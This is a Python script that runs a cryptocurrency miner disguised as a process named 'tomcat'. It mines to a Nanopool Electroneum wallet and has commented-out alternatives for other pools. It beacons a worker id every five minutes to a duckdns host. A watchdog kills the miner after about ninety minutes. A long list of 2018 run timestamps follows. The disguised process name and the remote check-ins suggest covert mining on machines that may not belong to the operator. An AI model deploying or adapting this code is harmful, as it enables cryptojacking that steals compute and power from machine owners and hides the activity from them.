import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:51:04.804156
#2018-02-17 16:37:03.686671
#2018-02-17 18:25:07.929855
#2018-02-17 20:13:04.542883
#2018-02-17 22:01:02.222701
#2018-02-17 23:44:05.695220
#2018-02-18 01:35:04.469734
#2018-02-18 03:22:04.756410
#2018-02-18 05:10:05.817477
#2018-02-18 07:02:04.532609
#2018-02-18 08:50:01.261814
#2018-02-18 10:37:02.190643
#2018-02-18 12:22:03.726206
#2018-02-18 14:09:01.678830
#2018-02-18 15:59:03.290250
#2018-02-18 17:49:01.277775
#2018-02-18 19:35:06.375536
#2018-02-18 21:20:06.932626
#2018-02-18 23:08:04.751589
#2018-02-19 00:55:04.197978
#2018-02-19 02:41:07.292872
#2018-02-19 04:28:05.251487
#2018-02-19 06:13:06.270618
#2018-02-19 07:59:06.800722
#2018-02-19 09:50:08.513706
#2018-02-19 11:40:01.382959
#2018-02-19 13:27:07.871098
#2018-02-19 15:16:07.455318
#2018-02-19 17:06:01.466316
#2018-02-19 18:53:07.756152
#2018-02-19 20:38:05.417006
#2018-02-19 22:24:05.662873
#2018-02-20 00:10:07.011748
#2018-02-20 01:56:01.740935
#2018-02-20 03:46:04.538128
#2018-02-20 05:31:06.892847
#2018-02-20 07:15:08.096152
#2018-02-20 09:02:05.680846
#2018-02-20 10:45:06.619464
#2018-02-20 12:32:05.054769
#2018-02-20 14:19:03.987898
#2018-02-20 16:04:12.220144
#2018-02-20 17:51:08.335712
#2018-02-20 19:41:06.569914
#2018-02-20 21:29:01.607726
#2018-02-20 23:12:01.357067
#2018-02-21 00:56:05.162994
#2018-02-21 02:44:01.812744
#2018-02-21 04:34:07.671294
#2018-02-21 06:22:06.498358
#2018-02-21 08:07:05.758418
#2018-02-21 09:53:01.937220
#2018-02-21 11:41:09.861763
#2018-02-21 13:31:07.232916
#2018-02-21 15:16:07.859128
#2018-02-21 17:06:12.250756
#2018-02-21 18:53:11.837468
#2018-02-21 20:42:06.795301
#2018-02-21 22:28:07.011947
#2018-02-22 00:17:04.379685
#2018-02-22 02:05:04.058247
#2018-02-22 03:50:08.762727
#2018-02-22 05:37:05.547801
#2018-02-22 07:23:05.176639
#2018-02-22 09:10:09.032318
#2018-02-22 10:58:01.495422
#2018-02-22 12:45:07.609655
#2018-02-22 14:32:01.381723
#2018-02-22 16:18:01.720160
#2018-02-22 18:05:07.984478
#2018-02-22 19:53:07.057221
#2018-02-22 21:41:02.224364
#2018-02-22 23:28:05.358675
#2018-02-23 01:17:05.332989
#2018-02-23 03:04:07.930121
#2018-02-23 04:52:05.761136
#2018-02-23 06:38:01.477471
#2018-02-23 08:28:02.091656
#2018-02-23 10:42:08.680425
#2018-02-23 12:37:02.071357
#2018-02-23 14:22:07.856367
#2018-02-23 16:13:01.960804
#2018-02-23 17:59:06.666656
#2018-02-23 19:45:12.039410
#2018-02-23 21:29:04.286662
#2018-02-23 23:17:05.736987
#2018-02-24 01:07:07.241788
#2018-02-24 02:59:05.135930
#2018-02-24 03:00:53.731248
#2018-02-24 04:46:04.905546
#2018-02-24 06:16:04.474151
#2018-02-24 07:52:05.971879
#2018-02-24 09:23:04.214083
#2018-02-24 11:09:03.762658
#2018-02-24 12:40:05.968433
#2018-02-24 14:19:05.729341
#2018-02-24 15:51:05.580970
#2018-02-24 17:32:06.404822
#2018-02-24 19:01:01.923695
#2018-02-24 20:32:01.564166
#2018-02-25 01:13:06.960194
#2018-02-25 05:03:07.256975
#2018-02-25 10:00:01.652492